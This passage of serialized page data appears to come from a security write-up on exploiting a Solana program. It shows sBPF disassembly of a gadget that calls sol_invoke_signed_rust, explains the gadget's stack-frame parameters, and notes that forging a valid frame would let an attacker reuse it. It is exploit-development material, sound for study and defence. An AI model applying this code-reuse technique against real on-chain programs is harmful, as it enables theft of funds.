r3",{"type":27,"tag":207,"props":51435,"children":51436},{"style":238},[51437],{"type":33,"value":51384},{"type":27,"tag":207,"props":51439,"children":51440},{"style":220},[51441],{"type":33,"value":51389},{"type":27,"tag":207,"props":51443,"children":51444},{"style":226},[51445],{"type":33,"value":11611},{"type":27,"tag":207,"props":51447,"children":51448},{"style":232},[51449],{"type":33,"value":6837},{"type":27,"tag":207,"props":51451,"children":51452},{"style":238},[51453],{"type":33,"value":51402},{"type":27,"tag":207,"props":51455,"children":51456},{"style":220},[51457],{"type":33,"value":51458},"var_80",{"type":27,"tag":207,"props":51460,"children":51461},{"style":238},[51462],{"type":33,"value":451},{"type":27,"tag":207,"props":51464,"children":51465},{"class":209,"line":296},[51466,51471,51476,51480,51485,51489,51493,51497,51502,51506,51511],{"type":27,"tag":207,"props":51467,"children":51468},{"style":220},[51469],{"type":33,"value":51470},"100001bb8",{"type":27,"tag":207,"props":51472,"children":51473},{"style":220},[51474],{"type":33,"value":51475}," 79a468ff00000000",{"type":27,"tag":207,"props":51477,"children":51478},{"style":220},[51479],{"type":33,"value":51374},{"type":27,"tag":207,"props":51481,"children":51482},{"style":220},[51483],{"type":33,"value":51484}," r4",{"type":27,"tag":207,"props":51486,"children":51487},{"style":238},[51488],{"type":33,"value":51384},{"type":27,"tag":207,"props":51490,"children":51491},{"style":220},[51492],{"type":33,"value":51389},{"type":27,"tag":207,"props":51494,"children":51495},{"style":226},[51496],{"type":33,"value":11611},{"type":27,"tag":207,"props":51498,"children":51499},{"style":232},[51500],{"type":33,"value":51501},"152",{"type":27,"tag":207,"props":51503,"children":51504},{"style":238},[51505],{"type":33,"value":51402},{"type":27,"tag":207,"props":51507,"children":51508},{"style":220},[51509],{"type":33,"value":51510},"var_98",{"type":27,"tag":207,"props":51512,"children":51513},{"style":238},[51514],{"type":33,"value":451},{"type":27,"tag":207,"props":51516,"children":51517},{"class":209,"line":445},[51518,51523,51528,51532,51537,51541,51545,51549,51553,51557,51562],{"type":27,"tag":207,"props":51519,"children":51520},{"style":220},[51521],{"type":33,"value":51522},"100001bc0",{"type":27,"tag":207,"props":51524,"children":51525},{"style":220},[51526],{"type":33,"value":51527}," 79a570ff00000000",{"type":27,"tag":207,"props":51529,"children":51530},{"style":220},[51531],{"type":33,"value":51374},{"type":27,"tag":207,"props":51533,"children":51534},{"style":220},[51535],{"type":33,"value":51536}," r5",{"type":27,"tag":207,"props":51538,"children":51539},{"style":238},[51540],{"type":33,"value":51384},{"type":27,"tag":207,"props":51542,"children":51543},{"style":220},[51544],{"type":33,"value":51389},{"type":27,"tag":207,"props":51546,"children":51547},{"style":226},[51548],{"type":33,"value":11611},{"type":27,"tag":207,"props":51550,"children":51551},{"style":232},[51552],{"type":33,"value":3642},{"type":27,"tag":207,"props":51554,"children":51555},{"style":238},[51556],{"type":33,"value":51402},{"type":27,"tag":207,"props":51558,"children":51559},{"style":220},[51560],{"type":33,"value":51561},"var_90",{"type":27,"tag":207,"props":51563,"children":51564},{"style":238},[51565],{"type":33,"value":451},{"type":27,"tag":207,"props":51567,"children":51568},{"class":209,"line":867},[51569,51574,51579,51584],{"type":27,"tag":207,"props":51570,"children":51571},{"style":220},[51572],{"type":33,"value":51573},"100001bc8",{"type":27,"tag":207,"props":51575,"children":51576},{"style":232},[51577],{"type":33,"value":51578}," 8520000020100000",{"type":27,"tag":207,"props":51580,"children":51581},{"style":220},[51582],{"type":33,"value":51583}," call",{"type":27,"tag":207,"props":51585,"children":51586},{"style":220},[51587],{"type":33,"value":51588}," sol_invoke_signed_rust\n",{"type":27,"tag":207,"props":51590,"children":51591},{"class":209,"line":892},[51592,51597,51602,51607,51611,51615,51619,51623,51627,51631],{"type":27,"tag":207,"props":51593,"children":51594},{"style":220},[51595],{"type":33,"value":51596},"100001bd0",{"type":27,"tag":207,"props":51598,"children":51599},{"style":232},[51600],{"type":33,"value":51601}," 5500040000000000",{"type":27,"tag":207,"props":51603,"children":51604},{"style":220},[51605],{"type":33,"value":51606}," jne",{"type":27,"tag":207,"props":51608,"children":51609},{"style":238},[51610],{"type":33,"value":4695},{"type":27,"tag":207,"props":51612,"children":51613},{"style":226},[51614],{"type":33,"value":2227},{"type":27,"tag":207,"props":51616,"children":51617},{"style":232},[51618],{"type":33,"value":1693},{"type":27,"tag":207,"props":51620,"children":51621},{"style":238},[51622],{"type":33,"value":9316},{"type":27,"tag":207,"props":51624,"children":51625},{"style":220},[51626],{"type":33,"value":1121},{"type":27,"tag":207,"props":51628,"children":51629},{"style":238},[51630],{"type":33,"value":1123},{"type":27,"tag":207,"props":51632,"children":51633},{"style":232},[51634],{"type":33,"value":51635},"0x0\n",{"type":27,"tag":207,"props":51637,"children":51638},{"class":209,"line":1475},[51639],{"type":27,"tag":207,"props":51640,"children":51641},{"emptyLinePlaceholder":19},[51642],{"type":33,"value":2062},{"type":27,"tag":207,"props":51644,"children":51645},{"class":209,"line":2065},[51646,51651,51656,51661,51666,51670],{"type":27,"tag":207,"props":51647,"children":51648},{"style":220},[51649],{"type":33,"value":51650},"100001bd8",{"type":27,"tag":207,"props":51652,"children":51653},{"style":220},[51654],{"type":33,"value":51655}," b701000018000000",{"type":27,"tag":207,"props":51657,"children":51658},{"style":220},[51659],{"type":33,"value":51660}," mov",{"type":27,"tag":207,"props":51662,"children":51663},{"style":220},[51664],{"type":33,"value":51665}," r1",{"type":27,"tag":207,"props":51667,"children":51668},{"style":238},[51669],{"type":33,"value":1123},{"type":27,"tag":207,"props":51671,"children":51672},{"style":232},[51673],{"type":33,"value":51674},"0x18\n",{"type":27,"tag":207,"props":51676,"children":51677},{"class":209,"line":2092},[51678,51683,51688,51692,51696,51700,51704,51708,51713,51717,51722],{"type":27,"tag":207,"props":51679,"children":51680},{"style":220},[51681],{"type":33,"value":51682},"100001be0",{"type":27,"tag":207,"props":51684,"children":51685},{"style":220},[51686],{"type":33,"value":51687}," 79a288ff00000000",{"type":27,"tag":207,"props":51689,"children":51690},{"style":220},[51691],{"type":33,"value":51374},{"type":27,"tag":207,"props":51693,"children":51694},{"style":220},[51695],{"type":33,"value":51379},{"type":27,"tag":207,"props":51697,"children":51698},{"style":238},[51699],{"type":33,"value":51384},{"type":27,"tag":207,"props":51701,"children":51702},{"style":220},[51703],{"type":33,"value":51389},{"type":27,"tag":207,"props":51705,"children":51706},{"style":226},[51707],{"type":33,"value":11611},{"type":27,"tag":207,"props":51709,"children":51710},{"style":232},[51711],{"type":33,"value":51712},"120",{"type":27,"tag":207,"props":51714,"children":51715},{"style":238},[51716],{"type":33,"value":51402},{"type":27,"tag":207,"props":51718,"children":51719},{"style":220},[51720],{"type":33,"value":51721},"var_78",{"type":27,"tag":207,"props":51723,"children":51724},{"style":238},[51725],{"type":33,"value":451},{"type":27,"tag":207,"props":51727,"children":51728},{"class":209,"line":2130},[51729,51734,51739,51744,51748,51752,51756,51760,51764,51768,51773,51778],{"type":27,"tag":207,"props":51730,"children":51731},{"style":220},[51732],{"type":33,"value":51733},"100001be8",{"type":27,"tag":207,"props":51735,"children":51736},{"style":232},[51737],{"type":33,"value":51738}," 6312000000000000",{"type":27,"tag":207,"props":51740,"children":51741},{"style":220},[51742],{"type":33,"value":51743}," stxw",{"type":27,"tag":207,"props":51745,"children":51746},{"style":238},[51747],{"type":33,"value":30305},{"type":27,"tag":207,"props":51749,"children":51750},{"style":220},[51751],{"type":33,"value":1137},{"type":27,"tag":207,"props":51753,"children":51754},{"style":226},[51755],{"type":33,"value":11611},{"type":27,"tag":207,"props":51757,"children":51758},{"style":232},[51759],{"type":33,"value":1660},{"type":27,"tag":207,"props":51761,"children":51762},{"style":238},[51763],{"type":33,"value":30333},{"type":27,"tag":207,"props":51765,"children":51766},{"style":220},[51767],{"type":33,"value":1129},{"type":27,"tag":207,"props":51769,"children":51770},{"style":238},[51771],{"type":33,"value":51772}," {",{"type":27,"tag":207,"props":51774,"children":51775},{"style":232},[51776],{"type":33,"value":51777},"0x18",{"type":27,"tag":207,"props":51779,"children":51780},{"style":238},[51781],{"type":33,"value":451},{"type":27,"tag":207,"props":51783,"children":51784},{"class":209,"line":2168},[51785,51790,51795,51800,51804,51808,51812],{"type":27,"tag":207,"props":51786,"children":51787},{"style":220},[51788],{"type":33,"value":51789},"100001bf0",{"type":27,"tag":207,"props":51791,"children":51792},{"style":232},[51793],{"type":33,"value":51794}," 0500030000000000",{"type":27,"tag":207,"props":51796,"children":51797},{"style":220},[51798],{"type":33,"value":51799}," ja",{"type":27,"tag":207,"props":51801,"children":51802},{"style":238},[51803],{"type":33,"value":4695},{"type":27,"tag":207,"props":51805,"children":51806},{"style":226},[51807],{"type":33,"value":2227},{"type":27,"tag":207,"props":51809,"children":51810},{"style":232},[51811],{"type":33,"value":1735},{"type":27,"tag":207,"props":51813,"children":51814},{"style":238},[51815],{"type":33,"value":13274},{"type":27,"tag":207,"props":51817,"children":51818},{"class":209,"line":4095},[51819],{"type":27,"tag":207,"props":51820,"children":51821},{"emptyLinePlaceholder":19},[51822],{"type":33,"value":2062},{"type":27,"tag":207,"props":51824,"children":51825},{"class":209,"line":4103},[51826,51831,51836,51840,51844,51848,51852,51856,51860,51864,51868],{"type":27,"tag":207,"props":51827,"children":51828},{"style":220},[51829],{"type":33,"value":51830},"100001bf8",{"type":27,"tag":207,"props":51832,"children":51833},{"style":220},[51834],{"type":33,"value":51835}," 79a188ff00000000",{"type":27,"tag":207,"props":51837,"children":51838},{"style":220},[51839],{"type":33,"value":51374},{"type":27,"tag":207,"props":51841,"children":51842},{"style":220},[51843],{"type":33,"value":51665},{"type":27,"tag":207,"props":51845,"children":51846},{"style":238},[51847],{"type":33,"value":51384},{"type":27,"tag":207,"props":51849,"children":51850},{"style":220},[51851],{"type":33,"value":51389},{"type":27,"tag":207,"props":51853,"children":51854},{"style":226},[51855],{"type":33,"value":11611},{"type":27,"tag":207,"props":51857,"children":51858},{"style":232},[51859],{"type":33,"value":51712},{"type":27,"tag":207,"props":51861,"children":51862},{"style":238},[51863],{"type":33,"value":51402},{"type":27,"tag":207,"props":51865,"children":51866},{"style":220},[51867],{"type":33,"value":51721},{"type":27,"tag":207,"props":51869,"children":51870},{"style":238},[51871],{"type":33,"value":451},{"type":27,"tag":207,"props":51873,"children":51874},{"class":209,"line":4154},[51875,51880,51885,51889,51893,51897],{"type":27,"tag":207,"props":51876,"children":51877},{"style":220},[51878],{"type":33,"value":51879},"100001c00",{"type":27,"tag":207,"props":51881,"children":51882},{"style":220},[51883],{"type":33,"value":51884}," bf02000000000000",{"type":27,"tag":207,"props":51886,"children":51887},{"style":220},[51888],{"type":33,"value":51660},{"type":27,"tag":207,"props":51890,"children":51891},{"style":220},[51892],{"type":33,"value":51379},{"type":27,"tag":207,"props":51894,"children":51895},{"style":238},[51896],{"type":33,"value":1123},{"type":27,"tag":207,"props":51898,"children":51899},{"style":220},[51900],{"type":33,"value":51901},"r0\n",{"type":27,"tag":207,"props":51903,"children":51904},{"class":209,"line":4203},[51905,51910,51915,51919,51924,51928,51933,51937,51941,51946,51950,51954,51959,51964,51968,51972],{"type":27,"tag":207,"props":51906,"children":51907},{"style":220},[51908],{"type":33,"value":51909},"100001c08",{"type":27,"tag":207,"props":51911,"children":51912},{"style":232},[51913],{"type":33,"value":51914}," 8510000075000000",{"type":27,"tag":207,"props":51916,"children":51917},{"style":220},[51918],{"type":33,"value":51583},{"type":27,"tag":207,"props":51920,"children":51921},{"style":8920},[51922],{"type":33,"value":51923}," _ZN94_",{"type":27,"tag":207,"props":51925,"children":51926},{"style":226},[51927],{"type":33,"value":17565},{"type":27,"tag":207,"props":51929,"children":51930},{"style":8920},[51931],{"type":33,"value":51932},"LT",{"type":27,"tag":207,"props":51934,"children":51935},{"style":226},[51936],{"type":33,"value":17565},{"type":27,"tag":207,"props":51938,"children":51939},{"style":220},[51940],{"type":33,"value":20930},{"type":27,"tag":207,"props":51942,"children":51943},{"style":226},[51944],{"type":33,"value":51945},"...$",{"type":27,"tag":207,"props":51947,"children":51948},{"style":220},[51949],{"type":33,"value":15323},{"type":27,"tag":207,"props":51951,"children":51952},{"style":226},[51953],{"type":33,"value":17565},{"type":27,"tag":207,"props":51955,"children":51956},{"style":8920},[51957],{"type":33,"value":51958},"GT",{"type":27,"tag":207,"props":51960,"children":51961},{"style":226},[51962],{"type":33,"value":51963},"$$",{"type":27,"tag":207,"props":51965,"children":51966},{"style":8920},[51967],{"type":33,"value":51958},{"type":27,"tag":207,"props":51969,"children":51970},{"style":226},[51971],{"type":33,"value":17565},{"type":27,"tag":207,"props":51973,"children":51974},{"style":238},[51975],{"type":33,"value":51976},"4from17ha0d289b72861b06dE\n",{"type":27,"tag":207,"props":51978,"children":51979},{"class":209,"line":4249},[51980],{"type":27,"tag":207,"props":51981,"children":51982},{"emptyLinePlaceholder":19},[51983],{"type":33,"value":2062},{"type":27,"tag":207,"props":51985,"children":51986},{"class":209,"line":4290},[51987,51992,51997,52001,52005,52009,52013,52017,52021,52025,52030],{"type":27,"tag":207,"props":51988,"children":51989},{"style":220},[51990],{"type":33,"value":51991},"100001c10",{"type":27,"tag":207,"props":51993,"children":51994},{"style":220},[51995],{"type":33,"value":51996}," 79a2b8ff00000000",{"type":27,"tag":207,"props":51998,"children":51999},{"style":220},[52000],{"type":33,"value":51374},{"type":27,"tag":207,"props":52002,"children":52003},{"style":220},[52004],{"type":33,"value":51379},{"type":27,"tag":207,"props":52006,"children":52007},{"style":238},[52008],{"type":33,"value":51384},{"type":27,"tag":207,"props":52010,"children":52011},{"style":220},[52012],{"type":33,"value":51389},{"type":27,"tag":207,"props":52014,"children":52015},{"style":226},[52016],{"type":33,"value":11611},{"type":27,"tag":207,"props":52018,"children":52019},{"style":232},[52020],{"type":33,"value":3542},{"type":27,"tag":207,"props":52022,"children":52023},{"style":238},[52024],{"type":33,"value":51402},{"type":27,"tag":207,"props":52026,"children":52027},{"style":220},[52028],{"type":33,"value":52029},"var_48",{"type":27,"tag":207,"props":52031,"children":52032},{"style":238},[52033],{"type":33,"value":451},{"type":27,"tag":207,"props":52035,"children":52036},{"class":209,"line":4304},[52037,52042,52047,52052,52056,52060,52064,52068,52072,52076],{"type":27,"tag":207,"props":52038,"children":52039},{"style":220},[52040],{"type":33,"value":52041},"100001c18",{"type":27,"tag":207,"props":52043,"children":52044},{"style":232},[52045],{"type":33,"value":52046}," 1502040000000000",{"type":27,"tag":207,"props":52048,"children":52049},{"style":220},[52050],{"type":33,"value":52051}," jeq",{"type":27,"tag":207,"props":52053,"children":52054},{"style":238},[52055],{"type":33,"value":4695},{"type":27,"tag":207,"props":52057,"children":52058},{"style":226},[52059],{"type":33,"value":2227},{"type":27,"tag":207,"props":52061,"children":52062},{"style":232},[52063],{"type":33,"value":1693},{"type":27,"tag":207,"props":52065,"children":52066},{"style":238},[52067],{"type":33,"value":9316},{"type":27,"tag":207,"props":52069,"children":52070},{"style":220},[52071],{"type":33,"value":1137},{"type":27,"tag":207,"props":52073,"children":52074},{"style":238},[52075],{"type":33,"value":1123},{"type":27,"tag":207,"props":52077,"children":52078},{"style":232},[52079],{"type":33,"value":51635},{"type":27,"tag":207,"props":52081,"children":52082},{"class":209,"line":5466},[52083],{"type":27,"tag":207,"props":52084,"children":52085},{"emptyLinePlaceholder":19},[52086],{"type":33,"value":2062},{"type":27,"tag":207,"props":52088,"children":52089},{"class":209,"line":5530},[52090,52095,52100,52105,52109,52113],{"type":27,"tag":207,"props":52091,"children":52092},{"style":220},[52093],{"type":33,"value":52094},"100001c20",{"type":27,"tag":207,"props":52096,"children":52097},{"style":232},[52098],{"type":33,"value":52099}," 2702000022000000",{"type":27,"tag":207,"props":52101,"children":52102},{"style":220},[52103],{"type":33,"value":52104}," mul",{"type":27,"tag":207,"props":52106,"children":52107},{"style":220},[52108],{"type":33,"value":51379},{"type":27,"tag":207,"props":52110,"children":52111},{"style":238},[52112],{"type":33,"value":1123},{"type":27,"tag":207,"props":52114,"children":52115},{"style":232},[52116],{"type":33,"value":52117},"0x22\n",{"type":27,"tag":207,"props":52119,"children":52120},{"class":209,"line":7900},[52121,52126,52131,52135,52139,52143,52147,52151,52156,52160,52165],{"type":27,"tag":207,"props":52122,"children":52123},{"style":220},[52124],{"type":33,"value":52125},"100001c28",{"type":27,"tag":207,"props":52127,"children":52128},{"style":220},[52129],{"type":33,"value":52130}," 79a1b0ff00000000",{"type":27,"tag":207,"props":52132,"children":52133},{"style":220},[52134],{"type":33,"value":51374},{"type":27,"tag":207,"props":52136,"children":52137},{"style":220},[52138],{"type":33,"value":51665},{"type":27,"tag":207,"props":52140,"children":52141},{"style":238},[52142],{"type":33,"value":51384},{"type":27,"tag":207,"props":52144,"children":52145},{"style":220},[52146],{"type":33,"value":51389},{"type":27,"tag":207,"props":52148,"children":52149},{"style":226},[52150],{"type":33,"value":11611},{"type":27,"tag":207,"props":52152,"children":52153},{"style":232},[52154],{"type":33,"value":52155},"80",{"type":27,"tag":207,"props":52157,"children":52158},{"style":238},[52159],{"type":33,"value":51402},{"type":27,"tag":207,"props":52161,"children":52162},{"style":220},[52163],{"type":33,"value":52164},"var_50",{"type":27,"tag":207,"props":52166,"children":52167},{"style":238},[52168],{"type":33,"value":451},{"type":27,"tag":207,"props":52170,"children":52171},{"class":209,"line":7909},[52172,52177,52182,52186,52190,52194],{"type":27,"tag":207,"props":52173,"children":52174},{"style":220},[52175],{"type":33,"value":52176},"100001c30",{"type":27,"tag":207,"props":52178,"children":52179},{"style":220},[52180],{"type":33,"value":52181}," b703000001000000",{"type":27,"tag":207,"props":52183,"children":52184},{"style":220},[52185],{"type":33,"value":51660},{"type":27,"tag":207,"props":52187,"children":52188},{"style":220},[52189],{"type":33,"value":51433},{"type":27,"tag":207,"props":52191,"children":52192},{"style":238},[52193],{"type":33,"value":1123},{"type":27,"tag":207,"props":52195,"children":52196},{"style":232},[52197],{"type":33,"value":52198},"0x1\n",{"type":27,"tag":207,"props":52200,"children":52201},{"class":209,"line":7917},[52202,52207,52212,52216],{"type":27,"tag":207,"props":52203,"children":52204},{"style":220},[52205],{"type":33,"value":52206},"100001c38",{"type":27,"tag":207,"props":52208,"children":52209},{"style":220},[52210],{"type":33,"value":52211}," 8510000003feffff",{"type":27,"tag":207,"props":52213,"children":52214},{"style":220},[52215],{"type":33,"value":51583},{"type":27,"tag":207,"props":52217,"children":52218},{"style":220},[52219],{"type":33,"value":52220}," __rust_dealloc\n",{"type":27,"tag":207,"props":52222,"children":52223},{"class":209,"line":7926},[52224],{"type":27,"tag":207,"props":52225,"children":52226},{"emptyLinePlaceholder":19},[52227],{"type":33,"value":2062},{"type":27,"tag":207,"props":52229,"children":52230},{"class":209,"line":7934},[52231,52236,52241,52245,52249,52253,52257,52261,52266,52270,52275],{"type":27,"tag":207,"props":52232,"children":52233},{"style":220},[52234],{"type":33,"value":52235},"100001c40",{"type":27,"tag":207,"props":52237,"children":52238},{"style":220},[52239],{"type":33,"value":52240}," 79a2d0ff00000000",{"type":27,"tag":207,"props":52242,"children":52243},{"style":220},[52244],{"type":33,"value":51374},{"type":27,"tag":207,"props":52246,"children":52247},{"style":220},[52248],{"type":33,"value":51379},{"type":27,"tag":207,"props":52250,"children":52251},{"style":238},[52252],{"type":33,"value":51384},{"type":27,"tag":207,"props":52254,"children":52255},{"style":220},[52256],{"type":33,"value":51389},{"type":27,"tag":207,"props":52258,"children":52259},{"style":226},[52260],{"type":33,"value":11611},{"type":27,"tag":207,"props":52262,"children":52263},{"style":232},[52264],{"type":33,"value":52265},"48",{"type":27,"tag":207,"props":52267,"children":52268},{"style":238},[52269],{"type":33,"value":51402},{"type":27,"tag":207,"props":52271,"children":52272},{"style":220},[52273],{"type":33,"value":52274},"var_30",{"type":27,"tag":207,"props":52276,"children":52277},{"style":238},[52278],{"type":33,"value":451},{"type":27,"tag":207,"props":52280,"children":52281},{"class":209,"line":7943},[52282,52287,52292,52296,52300,52304,52308,52312,52316,52320],{"type":27,"tag":207,"props":52283,"children":52284},{"style":220},[52285],{"type":33,"value":52286},"100001c48",{"type":27,"tag":207,"props":52288,"children":52289},{"style":232},[52290],{"type":33,"value":52291}," 1502030000000000",{"type":27,"tag":207,"props":52293,"children":52294},{"style":220},[52295],{"type":33,"value":52051},{"type":27,"tag":207,"props":52297,"children":52298},{"style":238},[52299],{"type":33,"value":4695},{"type":27,"tag":207,"props":52301,"children":52302},{"style":226},[52303],{"type":33,"value":2227},{"type":27,"tag":207,"props":52305,"children":52306},{"style":232},[52307],{"type":33,"value":1735},{"type":27,"tag":207,"props":52309,"children":52310},{"style":238},[52311],{"type":33,"value":9316},{"type":27,"tag":207,"props":52313,"children":52314},{"style":220},[52315],{"type":33,"value":1137},{"type":27,"tag":207,"props":52317,"children":52318},{"style":238},[52319],{"type":33,"value":1123},{"type":27,"tag":207,"props":52321,"children":52322},{"style":232},[52323],{"type":33,"value":51635},{"type":27,"tag":207,"props":52325,"children":52326},{"class":209,"line":7952},[52327],{"type":27,"tag":207,"props":52328,"children":52329},{"emptyLinePlaceholder":19},[52330],{"type":33,"value":2062},{"type":27,"tag":207,"props":52332,"children":52333},{"class":209,"line":7961},[52334,52339,52344,52348,52352,52356,52360,52364,52368,52372,52377],{"type":27,"tag":207,"props":52335,"children":52336},{"style":220},[52337],{"type":33,"value":52338},"100001c50",{"type":27,"tag":207,"props":52340,"children":52341},{"style":220},[52342],{"type":33,"value":52343}," 79a1c8ff00000000",{"type":27,"tag":207,"props":52345,"children":52346},{"style":220},[52347],{"type":33,"value":51374},{"type":27,"tag":207,"props":52349,"children":52350},{"style":220},[52351],{"type":33,"value":51665},{"type":27,"tag":207,"props":52353,"children":52354},{"style":238},[52355],{"type":33,"value":51384},{"type":27,"tag":207,"props":52357,"children":52358},{"style":220},[52359],{"type":33,"value":51389},{"type":27,"tag":207,"props":52361,"children":52362},{"style":226},[52363],{"type":33,"value":11611},{"type":27,"tag":207,"props":52365,"children":52366},{"style":232},[52367],{"type":33,"value":6291},{"type":27,"tag":207,"props":52369,"children":52370},{"style":238},[52371],{"type":33,"value":51402},{"type":27,"tag":207,"props":52373,"children":52374},{"style":220},[52375],{"type":33,"value":52376},"var_38",{"type":27,"tag":207,"props":52378,"children":52379},{"style":238},[52380],{"type":33,"value":451},{"type":27,"tag":207,"props":52382,"children":52383},{"class":209,"line":7969},[52384,52389,52393,52397,52401,52405],{"type":27,"tag":207,"props":52385,"children":52386},{"style":220},[52387],{"type":33,"value":52388},"100001c58",{"type":27,"tag":207,"props":52390,"children":52391},{"style":220},[52392],{"type":33,"value":52181},{"type":27,"tag":207,"props":52394,"children":52395},{"style":220},[52396],{"type":33,"value":51660},{"type":27,"tag":207,"props":52398,"children":52399},{"style":220},[52400],{"type":33,"value":51433},{"type":27,"tag":207,"props":52402,"children":52403},{"style":238},[52404],{"type":33,"value":1123},{"type":27,"tag":207,"props":52406,"children":52407},{"style":232},[52408],{"type":33,"value":52198},{"type":27,"tag":207,"props":52410,"children":52411},{"class":209,"line":7978},[52412,52417,52422,52426],{"type":27,"tag":207,"props":52413,"children":52414},{"style":220},[52415],{"type":33,"value":52416},"100001c60",{"type":27,"tag":207,"props":52418,"children":52419},{"style":220},[52420],{"type":33,"value":52421}," 85100000fefdffff",{"type":27,"tag":207,"props":52423,"children":52424},{"style":220},[52425],{"type":33,"value":51583},{"type":27,"tag":207,"props":52427,"children":52428},{"style":220},[52429],{"type":33,"value":52220},{"type":27,"tag":207,"props":52431,"children":52432},{"class":209,"line":7987},[52433],{"type":27,"tag":207,"props":52434,"children":52435},{"emptyLinePlaceholder":19},[52436],{"type":33,"value":2062},{"type":27,"tag":207,"props":52438,"children":52439},{"class":209,"line":7996},[52440,52445,52450,52455,52460,52465],{"type":27,"tag":207,"props":52441,"children":52442},{"style":220},[52443],{"type":33,"value":52444},"100001c68",{"type":27,"tag":207,"props":52446,"children":52447},{"style":232},[52448],{"type":33,"value":52449}," 9500000000000000",{"type":27,"tag":207,"props":52451,"children":52452},{"style":220},[52453],{"type":33,"value":52454}," exit",{"type":27,"tag":207,"props":52456,"children":52457},{"style":238},[52458],{"type":33,"value":52459}," {",{"type":27,"tag":207,"props":52461,"children":52462},{"style":220},[52463],{"type":33,"value":52464},"__return_addr",{"type":27,"tag":207,"props":52466,"children":52467},{"style":238},[52468],{"type":33,"value":451},{"type":27,"tag":36,"props":52470,"children":52471},{},[52472,52474,52480],{"type":33,"value":52473},"Which, assuming that ",{"type":27,"tag":84,"props":52475,"children":52477},{"className":52476},[],[52478],{"type":33,"value":52479},"sol_invoke_signed_rust",{"type":33,"value":52481}," returns 0, is doing the following:",{"type":27,"tag":12719,"props":52483,"children":52484},{},[52485,52494,52503],{"type":27,"tag":1232,"props":52486,"children":52487},{},[52488],{"type":27,"tag":84,"props":52489,"children":52491},{"className":52490},[],[52492],{"type":33,"value":52493},"sol_invoke_signed_rust(r1, [r10-136], [r10-128], [r10-152], [r10-144])",{"type":27,"tag":1232,"props":52495,"children":52496},{},[52497],{"type":27,"tag":84,"props":52498,"children":52500},{"className":52499},[],[52501],{"type":33,"value":52502},"*[r10-120] = 0x18",{"type":27,"tag":1232,"props":52504,"children":52505},{},[52506,52508,52514,52516,52523],{"type":33,"value":52507},"Calls ",{"type":27,"tag":84,"props":52509,"children":52511},{"className":52510},[],[52512],{"type":33,"value":52513},"__rust_dealloc",{"type":33,"value":52515},", which in default circumstances is a ",{"type":27,"tag":47,"props":52517,"children":52520},{"href":52518,"rel":52519},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/entrypoint.rs#L257C1-L259",[51],[52521],{"type":33,"value":52522},"NOP",{"type":33,"value":1041},{"type":27,"tag":36,"props":52525,"children":52526},{},[52527],{"type":33,"value":52528},"r10 is the stack pointer, so it will point to the stack frame of the current depth when executing that instruction.",{"type":27,"tag":36,"props":52530,"children":52531},{},[52532],{"type":33,"value":52533},"If we correctly set up the stack frame used by this gadget with valid parameters, that's a win.",{"type":27,"tag":36,"props":52535,"children":52536},{},[52537,52539,52546],{"type":33,"value":52538},"Looking at the ",{"type":27,"tag":47,"props":52540,"children":52543},{"href":52541,"rel":52542},"https://github.com/solana-labs/solana/blob/master/sdk/program/src/syscalls/definitions.rs#L59",[51],[52544],{"type":33,"value":52545},"definition",{"type":33,"value":52547},", it's not crystal clear what the parameters are:",{"type":27,"tag":101,"props":52549,"children":52551},{"className":10270,"code":52550,"language":10269,"meta":7,"style":7},"fn sol_invoke_signed_rust(instruction_addr: *const u8, account_infos_addr: *const u8, account_infos_len: u64, signers_seeds_addr: *const u8, signers_seeds_len: u64) -> u64\n",[52552],{"type":27,"tag":84,"props":52553,"children":52554},{"__ignoreMap":7},[52555],{"type":27,"tag":207,"props":52556,"children":52557},{"class":209,"line":210},[52558,52562,52567,52571,52576,52580,52584,52588,52592,52596,52601,52605,52609,52613,52617,52621,52626,52630,52634,52638,52643,52647,52651,52655,52659,52663,52668,52672,52676,52680,52684],{"type":27,"tag":207,"props":52559,"children":52560},{"style":214},[52561],{"type":33,"value":27538},{"type":27,"tag":207,"props":52563,"children":52564},{"style":1335},[52565],{"type":33,"value":52566}," sol_invoke_signed_rust",{"type":27,"tag":207,"props":52568,"children":52569},{"style":238},[52570],{"type":33,"value":1343},{"type":27,"tag":207,"props":52572,"children":52573},{"style":220},[52574],{"type":33,"value":52575},"instruction_addr",{"type":27,"tag":207,"props":52577,"children":52578},{"style":226},[52579],{"type":33,"value":736},{"type":27,"tag":207,"props":52581,"children":52582},{"style":226},[52583],{"type":33,"value":17093},{"type":27,"tag":207,"props":52585,"children":52586},{"style":214},[52587],{"type":33,"value":16931},{"type":27,"tag":207,"props":52589,"children":52590},{"style":8920},[52591],{"type":33,"value":21910},{"type":27,"tag":207,"props":52593,"children":52594},{"style":238},[52595],{"type":33,"value":1123},{"type":27,"tag":207,"props":52597,"children":52598},{"style":220},[52599],{"type":33,"value":52600},"account_infos_addr",{"type":27,"tag":207,"props":52602,"children":52603},{"style":226},[52604],{"type":33,"value":736},{"type":27,"tag":207,"props":52606,"children":52607},{"style":226},[52608],{"type":33,"value":17093},{"type":27,"tag":207,"props":52610,"children":52611},{"style":214},[52612],{"type":33,"value":16931},{"type":27,"tag":207,"props":52614,"children":52615},{"style":8920},[52616],{"type":33,"value":21910},{"type":27,"tag":207,"props":52618,"children":52619},{"style":238},[52620],{"type":33,"value":1123},{"type":27,"tag":207,"props":52622,"children":52623},{"style":220},[52624],{"type":33,"value":52625},"account_infos_len",{"type":27,"tag":207,"props":52627,"children":52628},{"style":226},[52629],{"type":33,"value":736},{"type":27,"tag":207,"props":52631,"children":52632},{"style":8920},[52633],{"type":33,"value":13142},{"type":27,"tag":207,"props":52635,"children":52636},{"style":238},[52637],{"type":33,"value":1123},{"type":27,"tag":207,"props":52639,"children":52640},{"style":220},[52641],{"type":33,"value":52642},"signers_seeds_addr",{"type":27,"tag":207,"props":52644,"children":52645},{"style":226},[52646],{"type":33,"value":736},{"type":27,"tag":207,"props":52648,"children":52649},{"style":226},[52650],{"type":33,"value":17093},{"type":27,"tag":207,"props":52652,"children":52653},{"style":214},[52654],{"type":33,"value":16931},{"type":27,"tag":207,"props":52656,"children":52657},{"style":8920},[52658],{"type":33,"value":21910},{"type":27,"tag":207,"props":52660,"children":52661},{"style":238},[52662],{"type":33,"value":1123},{"type":27,"tag":207,"props":52664,"children":52665},{"style":220},[52666],{"type":33,"value":52667},"signers_seeds_len",{"type":27,"tag":207,"props":52669,"children":52670},{"style":226},[52671],{"type":33,"value":736},{"type":27,"tag":207,"props":52673,"children":52674},{"style":8920},[52675],{"type":33,"value":13142},{"type":27,"tag":207,"props":52677,"children":52678},{"style":238},[52679],{"type":33,"value":2222},{"type":27,"tag